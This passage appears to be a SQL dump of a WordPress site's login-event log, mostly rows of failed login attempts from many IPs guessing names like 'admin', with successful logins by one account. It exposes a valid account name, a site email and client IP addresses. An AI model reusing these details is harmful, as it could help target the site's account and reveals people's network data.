Safari/537.36'),(19033,116141,1693391962.115749,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19034,116142,1693391962.333516,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19035,116143,1693391962.549607,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19036,116144,1693391962.782122,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19028,116136,1693391960.472982,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19029,116137,1693391961.227921,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19030,116138,1693391961.457413,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19027,116126,1693386433.996813,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF6EEBF9ED,'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19023,116122,1693386423.132944,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF208DD6DA,'Mozilla/5.0 (Linux; Android 10; LM-K200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19024,116123,1693386425.616362,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF867AD6BE,'Mozilla/5.0 (Linux; Android 11; SM-S102DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19025,116124,1693386428.727063,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF701B8878,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N976U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19026,116125,1693386431.846267,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF676E31E3,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19073,116511,1693539786.450050,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19074,116512,1693539788.025939,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19075,116513,1693539791.740274,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19076,116514,1693539792.646970,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19077,116515,1693539793.467683,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19078,116516,1693540680.037115,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19049,116168,1693414380.907960,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19050,116169,1693414691.036790,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19051,116170,1693416499.079350,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19052,116446,1693460077.962165,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFBB5554F2,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36'),(19053,116447,1693460080.711992,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF51100C9B,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(19054,116448,1693460083.294828,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF6F2AAF65,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.58'),(19055,116449,1693460086.923870,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFCE2A3449,'Mozilla/5.0 (Linux; Android 11; DE2118) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19056,116463,1693493952.022670,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19079,116517,1693540683.228412,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19080,116518,1693540688.284728,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19081,116519,1693540705.553857,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19082,116520,1693540706.797967,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(19116,116730,1693732349.750126,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBA94ABA7,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/15.0 Chrome/90.0.4430.210 Mobile Safari/537.36'),(19117,116731,1693732353.240954,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFB1DF1871,'Mozilla/5.0 (Linux; Android 11; motorola one 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19118,116732,1693732355.118379,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF5BDFC309,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/81.0.4044.124 Mobile/15E148 Safari/604.1'),(19119,116733,1693732356.860925,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF2692466C,'Mozilla/5.0 (Linux; Android 11; SM-F711W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19120,116734,1693732359.063885,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF0EA11B27,'Mozilla/5.0 (Linux; Android 11; SM-G981V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19121,116735,1693732361.281691,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF67762C42,'Mozilla/5.0 (Linux; Android 9; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19122,116736,1693732362.834779,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF5CFFC3BF,'Mozilla/5.0 (Linux; Android 8.1.0; LML212VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36'),(19165,117217,1693907945.160067,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFCA46906A,'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19134,117034,1693814418.351292,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF66DA2EA8,'Mozilla/5.0 (Linux; Android 7.0; LG-H831) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19135,117035,1693814419.830653,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF59208589,'Mozilla/5.0 (Linux; Android 7.0; LGL64VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 Mobile Safari/537.36'),(19136,117036,1693814439.076213,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF29DC8477,'Mozilla/5.0 (Linux; Android 11; SM-S102DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19137,117037,1693814442.261310,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF67743068,'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/189.0.413529291 Mobile/15E148 Safari/604.1'),(19138,117038,1693814444.926613,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF2DBBF400,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15'),(19139,117039,1693814446.687901,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFC2F72AAE,'Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19099,116693,1693717641.578788,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19100,116694,1693717642.156870,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19094,116642,1693658168.926445,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9448285A,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(19105,116699,1693717643.151220,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19106,116700,1693717643.334069,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19107,116701,1693717643.523405,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19108,116702,1693717644.139575,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19109,116703,1693717644.351012,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19110,116704,1693717644.527884,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19111,116723,1693731756.470581,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB19869C4,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(19112,116725,1693731759.774573,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF2B9955A1,'Mozilla/5.0 (Linux; Android 11; SM-G780F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19113,116726,1693731762.472807,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFABEBB87E,'Mozilla/5.0 (Linux; Android 11; SM-A505U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19101,116695,1693717642.387540,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19087,116604,1693643415.344327,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFFCA087223,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19088,116605,1693643417.119824,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFF6D4B2286,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19089,116606,1693643419.388859,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFFA8796724,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19090,116607,1693643424.622564,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFF76AE542C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19091,116608,1693643426.831836,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFF743AE33C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19092,116609,1693643428.748209,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFFC57857F6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19093,116610,1693643433.458925,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFF679D7B30,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(19102,116696,1693717642.566144,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19103,116697,1693717642.794063,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19104,116698,1693717642.973687,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19083,116582,1693615976.421413,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA45AAA1F,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(19084,116584,1693620342.038745,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1761CDD2,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(19085,116597,1693629131.148231,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBA2E38B2,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(19086,116598,1693629133.743062,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF2DB3C874,'Mozilla/5.0 (Linux; Android 9; SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19155,117206,1693907831.771117,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF6883D4EA,'Mozilla/5.0 (Linux; Android 9; U693CL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19156,117207,1693907833.978984,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF80C9A546,'Mozilla/5.0 (Linux; Android 11; SM-A516V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19157,117208,1693907844.061982,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFB5EF8CD5,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19095,116649,1693673498.789044,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF276C9458,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(19164,117216,1693907942.678908,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFB1B8B095,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0'),(19096,116685,1693707238.564173,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF348C1129,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(19097,116691,1693717640.664597,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19098,116692,1693717640.984494,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF176576AB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19159,117211,1693907870.602188,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF3DB9E073,'Mozilla/5.0 (Linux; Android 9; LGL722DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19158,117209,1693907847.596204,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFB15B4C22,'Mozilla/5.0 (Linux; Android 11; B140DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19160,117212,1693907932.843483,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBAE87701,'Mozilla/5.0 (Linux; Android 9; SM-J260A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19161,117213,1693907934.876090,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF9EB5264F,'Mozilla/5.0 (Linux; Android 11; moto g stylus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19162,117214,1693907937.930609,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF8600CEEE,'Mozilla/5.0 (Linux; Android 11; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19163,117215,1693907940.400896,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF943B4AD6,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19234,117923,1694317028.044439,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF73545B48,'Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19205,117712,1694134404.260950,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB495EA6C,'Mozilla/5.0 (Linux; Android 12; SM-G991U Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.87 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/344.0.0.8.106;]'),(19206,117713,1694134413.118119,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF6784F324,'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19207,117714,1694134417.159157,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFBAED8C12,'Mozilla/5.0 (Linux; Android 11; KB2005) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19208,117715,1694134420.496418,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFC429CC49,'Mozilla/5.0 (Linux; Android 11; SM-T970) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(19209,117716,1694134422.738362,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFC5D32BFA,'Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile DuckDuckGo/5 Safari/537.36'),(19210,117717,1694134425.640034,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFCA3E3EA6,'Mozilla/5.0 (iPhone; CPU iPhone OS 12_5_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),(19169,117259,1693955028.632607,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFD919CE20,'Mozilla/5.0 (X11; CrOS x86_64 14324.72.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.91 Safari/537.36'),(19170,117260,1693955030.643394,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF71A13B93,'Mozilla/5.0 (Linux; Android 11; SM-N976V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19140,117131,1693861325.306654,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19141,117134,1693865169.081078,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19142,117151,1693883423.126022,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19143,117152,1693883854.334896,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19144,117186,1693890190.716967,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2DB1BC9E,'Mozilla/5.0 (Linux; Android 11; motorola one 5G UW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19145,117187,1693890194.136840,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF67ABAC29,'Mozilla/5.0 (Linux; Android 12; Pixel 4a (5G)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19146,117188,1693890196.342025,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF50D21E74,'Mozilla/5.0 (Linux; Android 10; moto g(7) power) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19147,117189,1693890198.405549,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF2D40B2DF,'Mozilla/5.0 (Linux; Android 11; 5062W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19148,117190,1693890200.862362,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFB58F78FC,'Mozilla/5.0 (Linux; Android 11; M2004J7BC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19149,117192,1693890204.280926,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFBF610400,'Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19178,117270,1693958150.241734,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF2F3B9A94,'Mozilla/5.0 (Linux; Android 12; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19179,117271,1693958154.022379,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF92382A63,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'),(19180,117280,1693979391.750441,1,'loginFailInvalidUsername','tombomyman',0,0x00000000000000000000FFFF14E1A0CE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19181,117331,1693994560.550035,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF284D1460,'Mozilla/5.0'),(19182,117407,1694015751.475619,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19183,117408,1694015754.446975,1,'loginFailValidUsername','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19184,117410,1694015765.993099,1,'loginFailValidUsername','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19185,117411,1694015793.298808,1,'loginFailValidUsername','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19186,117412,1694015812.284515,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19202,117534,1694063777.786445,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF287AC9E0,'Mozilla/5.0'),(19203,117616,1694099831.089165,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 